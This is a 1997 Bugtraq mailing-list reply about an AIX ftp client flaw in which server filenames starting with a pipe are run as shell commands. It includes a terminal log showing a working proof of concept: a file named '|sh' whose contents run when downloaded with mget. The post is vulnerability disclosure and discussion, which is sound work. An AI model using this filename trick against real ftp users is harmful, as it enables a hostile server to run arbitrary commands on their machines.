[5480] in bugtraq
Re: IBM-ERS Security Vulnerability Alert: The AIX ftp client
daemon@ATHENA.MIT.EDU (af@C4C.COM)
Mon Nov 3 13:00:44 1997
Date: Mon, 3 Nov 1997 10:03:52 -0700
Reply-To: af@C4C.COM
From: af@C4C.COM
X-To: Miguel Angel Rodriguez Jodar <rodriguj@DRAGO.FIE.US.ES>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <3458EDAF.BC2716F0@drago.fie.us.es>
> ers@VNET.IBM.COM wrote:
> > VULNERABILITY: The AIX ftp client interprets server provided
> > filenames
> > I. Description
> > The ftp client can be tricked into running arbitrary commands supplied
> > by the
> > remote server. When the remote file begins with a pipe symbol, the
> > ftp client
> > will process the contents of the remote file as a shell script.
>
> On two machines running AIX 3.2.5 I've tested it, but instead of
> executing the remote file, it searches for a local file with the same
> name as the remote file and executes it with normal user priviledges
> instead of root privilegdes.
Yes, but try "|sh" instead. I've included a log of what happens.
> BTW, I believe that this also happens on HP-UX 9.05
It works on our Linux slackware as well. I suspect most ftp
clients are susceptible to this "problem."
$ id
uid=100(guest) gid=100(usr)
$ pwd
/tmp/ftp-test
$ echo "id > /tmp/OUT" > "|sh"
$ ls -la
total 24
drwxr-xr-x 2 guest usr 512 Nov 3 09:45 .
drwxrwxrwt 6 bin bin 1024 Nov 3 09:44 ..
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
$ ftp localhost
Connected to localhost.
....snip....
230 User guest logged in.
ftp> cd /tmp/ftp-test
ftp> ls -l
total 24
-rw-r--r-- 1 guest usr 14 Nov 3 09:45 |sh
ftp> mget *
mget |sh? y
150 Opening data connection for |sh (14 bytes).
15 bytes received in 0.2187 seconds (0.06699 Kbytes/s)
local: |sh remote: |sh
ftp> quit
$ ls -l /tmp/OUT
-rw-r--r-- 1 guest usr 28 Nov 3 09:45 /tmp/OUT
$ cat /tmp/OUT
uid=100(guest) gid=100(usr)
$
I also wonder about IBM's answer:
SOLUTION: Remove the setuid bit from the "ftp" command.
On our 4.2.1, ftp will not run if it is not suid.
Didn't somebody test this?
Andrew Green
af@c4c.com
